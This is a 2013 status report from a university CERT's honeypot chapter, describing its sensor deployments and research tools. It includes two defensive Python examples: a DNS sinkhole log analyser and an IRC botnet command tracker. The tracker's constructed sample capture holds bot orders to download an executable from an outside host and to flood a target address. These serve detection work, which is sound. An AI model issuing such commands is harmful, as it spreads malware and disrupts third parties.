UNAM Chapter - Status Report for 2013

ORGANIZATION

The UNAM Chapter is part of UNAM-CERT, an organization established within the National Autonomous University of Mexico (UNAM).

Current chapter members:

  • Roberto Sanchez - Chapter lead.
  • Miguel Bautista - Chapter member.
  • Ruben Aquino - Chapter member.
  • Pablo Lorenzana - Chapter member.
  • Andres Hernandez - Chapter member.
  • Javier Santillan - Chapter member.

DEPLOYMENTS

We use the following infrastructure as an early warning and intrusion detection system that feeds our incident response process, and also to identify emerging threats on the Internet and share that knowledge with the community.

We have 15 new Raspberry Pis and 3 HonEeeBoxes: 5 Pis run Conpot, 5 Pis run Thug and publish their results directly to hpfeeds, and the remaining devices are used for mobile and Linux malware analysis.

One server with 8970 public IP addresses runs Kippo, Dionaea and Glastopf; all captured data is shared through hpfeeds.

We also run a centralized, tiered network monitoring architecture based on Snort, Argus, tcpflow and several other data capture and analysis tools.

A central system called “UNAM Security Telescope” processes all the information gathered by our honeypots and by the centralized monitoring architecture.

RESEARCH AND DEVELOPMENT

We have developed a DNS sinkhole to track and identify potentially infected hosts (machines running malware or bots) within the University's network: a resolver that answers for known-malicious domains logs which internal clients are asking for them.
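The detection side of that idea, as an added illustration (not the chapter's own sinkhole code): a resolver configured to answer for the sinkholed domains writes BIND-style query logs, and the script below walks those logs and reports which internal clients asked for a sinkholed name, how often, and when. The log lines, the sinkholed domain list and the internal address prefixes are all constructed for the example.

```python
import re
from datetime import datetime

# Constructed for the example: domains the sinkhole resolver answers for.
# A real deployment would load these from the blocklist that feeds the resolver.
SINKHOLED_DOMAINS = {"c2.malware.example", "bot-update.example"}

# Assumed internal ranges; a query from these implicates a campus host.
INTERNAL_PREFIXES = ("10.", "192.168.", "172.16.")

# BIND query-log format (assumed):
#   DD-Mon-YYYY HH:MM:SS.mmm client IP#port: query: NAME IN TYPE + (resolver)
QUERY_RE = re.compile(
    r"^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2})\.\d+ "
    r"client (?P<client>[\d.]+)#\d+(?: \([^)]*\))?: query: "
    r"(?P<name>\S+) IN (?P<qtype>\S+)"
)

# Constructed sample log; resolver address is from the documentation range.
SAMPLE_LOG = """\
01-Nov-2013 10:15:02.123 client 10.1.2.3#53122: query: c2.malware.example IN A + (203.0.113.2)
01-Nov-2013 10:15:05.001 client 10.1.2.3#53123: query: www.example.org IN A + (203.0.113.2)
01-Nov-2013 10:16:40.555 client 10.1.2.3#53140: query: update.c2.malware.example IN A + (203.0.113.2)
01-Nov-2013 10:17:01.010 client 10.7.7.7#40000: query: bot-update.example IN A + (203.0.113.2)
01-Nov-2013 10:18:00.000 client 198.51.100.9#40000: query: c2.malware.example IN A + (203.0.113.2)
this line is not a query log entry
""".splitlines()


def sinkholed_domain(name):
    """Return the sinkholed domain that NAME matches (exact or subdomain), else None."""
    name = name.rstrip(".").lower()
    for domain in SINKHOLED_DOMAINS:
        if name == domain or name.endswith("." + domain):
            return domain
    return None


def is_internal(ip):
    return ip.startswith(INTERNAL_PREFIXES)


def analyze_query_log(lines):
    """Map internal client IP -> sinkholed domain -> {count, first_seen, last_seen}."""
    hits = {}
    for line in lines:
        m = QUERY_RE.match(line)
        if not m:
            continue  # not a query entry; skip silently
        domain = sinkholed_domain(m["name"])
        if domain is None or not is_internal(m["client"]):
            continue  # benign name, or an external client we cannot act on
        ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
        entry = hits.setdefault(m["client"], {}).setdefault(
            domain, {"count": 0, "first_seen": ts, "last_seen": ts})
        entry["count"] += 1
        entry["first_seen"] = min(entry["first_seen"], ts)
        entry["last_seen"] = max(entry["last_seen"], ts)
    return hits


if __name__ == "__main__":
    for client, domains in analyze_query_log(SAMPLE_LOG).items():
        for domain, info in domains.items():
            print(f"{client} -> {domain}: {info['count']} queries, "
                  f"{info['first_seen']} .. {info['last_seen']}")
```

Subdomain matching matters in practice: malware often rotates hostnames under one registered domain, so `update.c2.malware.example` must count against `c2.malware.example`. External clients are dropped because the sinkhole only helps with hosts the University can actually remediate.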

We are developing a spampot tool to collect and analyse spam content (URLs, attachments and source IP addresses), as well as a botnet tracking tool that logs the activity of infected machines by analysing the commands the C&C sends over the IRC protocol.
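The core of such an IRC C&C tracker, written here as an added example rather than the chapter's own tool: parse the RFC 1459 messages from a captured C&C session, record which nicks joined the channel (the bots) and which nick issued prefixed commands (the operator), and turn each command into a structured log entry. The captured session, the channel name and the "." command prefix are all constructed for the example; the real tool would read the stream from tcpflow or a live socket.

```python
import re

# RFC 1459 message: [':' prefix SPACE] command [params] [' :' trailing]
IRC_RE = re.compile(
    r"^(?::(?P<prefix>\S+) )?(?P<command>\S+)(?P<params>(?: (?!:)\S+)*)"
    r"(?: :(?P<trailing>.*))?$"
)
# prefix is either a server name or nick!user@host
PREFIX_RE = re.compile(r"^(?P<nick>[^!@]+)(?:!(?P<user>[^@]+))?(?:@(?P<host>.+))?$")

# Constructed capture of a bot joining a channel and receiving commands.
SAMPLE_SESSION = [
    ":irc.example 001 b0t-1a2b :Welcome",
    ":b0t-1a2b!bot@10.1.2.3 JOIN :#bots",
    ":b0t-9f9f!bot@10.4.4.4 JOIN #bots",
    "PING :irc.example",
    ":herder!op@198.51.100.7 PRIVMSG #bots :.download http://198.51.100.7/x.exe",
    ":b0t-1a2b!bot@10.1.2.3 PRIVMSG #bots :[DOWNLOAD]: saved x.exe",
    ":herder!op@198.51.100.7 PRIVMSG #bots :.ddos 203.0.113.5 80 60",
]


def parse_irc_line(line):
    """Split one IRC line into nick/user/host, command, params and trailing text."""
    m = IRC_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    msg = {"nick": None, "user": None, "host": None,
           "command": m["command"].upper(),
           "params": m["params"].split(), "trailing": m["trailing"]}
    if m["prefix"]:
        p = PREFIX_RE.match(m["prefix"])
        if p:
            msg.update(nick=p["nick"], user=p["user"], host=p["host"])
    return msg


def track_cc_session(lines, cmd_prefix="."):
    """Walk a captured IRC stream and return members, operators, bots and the command log."""
    members = {}   # nick -> (host, channel) for every JOIN seen
    commands = []  # one entry per operator command
    for line in lines:
        msg = parse_irc_line(line)
        if msg is None:
            continue
        if msg["command"] == "JOIN":
            # the channel may be a parameter ("JOIN #bots") or trailing ("JOIN :#bots")
            channel = msg["params"][0] if msg["params"] else msg["trailing"]
            members[msg["nick"]] = (msg["host"], channel)
        elif (msg["command"] == "PRIVMSG" and msg["trailing"]
              and msg["trailing"].startswith(cmd_prefix)):
            cmd, *args = msg["trailing"][len(cmd_prefix):].split()
            commands.append({"from": msg["nick"], "to": msg["params"][0],
                             "cmd": cmd, "args": args})
    operators = {c["from"] for c in commands}
    bots = {nick: info for nick, info in members.items() if nick not in operators}
    return {"members": members, "operators": operators, "bots": bots, "commands": commands}


if __name__ == "__main__":
    result = track_cc_session(SAMPLE_SESSION)
    for nick, (host, channel) in result["bots"].items():
        print(f"bot {nick} from {host} in {channel}")
    for c in result["commands"]:
        print(f"{c['from']} -> {c['to']}: {c['cmd']} {' '.join(c['args'])}")
```

Bot replies in the channel (the `[DOWNLOAD]` line) are deliberately not treated as commands because they lack the prefix; a production tracker would log them separately as evidence of what each infected host did in response.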

A distributed sandbox based on the Cuckoo platform, automating malware analysis on Windows XP, 7 and 8, is in development.

PAPERS, PRESENTATIONS AND COMMUNITY ENGAGEMENTS

In November we gave honeypot training in Mexico City to the community interested in honeypots and intrusion detection, as part of UNAM's Security Congress 2013.

As part of UNAM-CERT, one of our main activities is incident detection and handling within the University and Mexico. For that reason we keep close contact with the CSIRTs of the main Mexican ISPs and share with them the security incidents originating from their networks that we detect on the University network.

FINDINGS

No particular findings yet.

GOALS

  • Identify attack trends in Mexico through statistics and charts generated from the data collected by our honeypots, and publish them on our web page.
  • Increase the number of our deployments within the University and the Mexican academic networks.
  • Deploy and improve our spampot and botnet tracking tools.

MISC

Every year we organize a Computer Security Congress. It is a balanced meeting that includes technical and non-technical talks. Its main purposes are to share experiences, to discuss trends, and to give attendees a better perspective on computer security in Mexican networks and worldwide.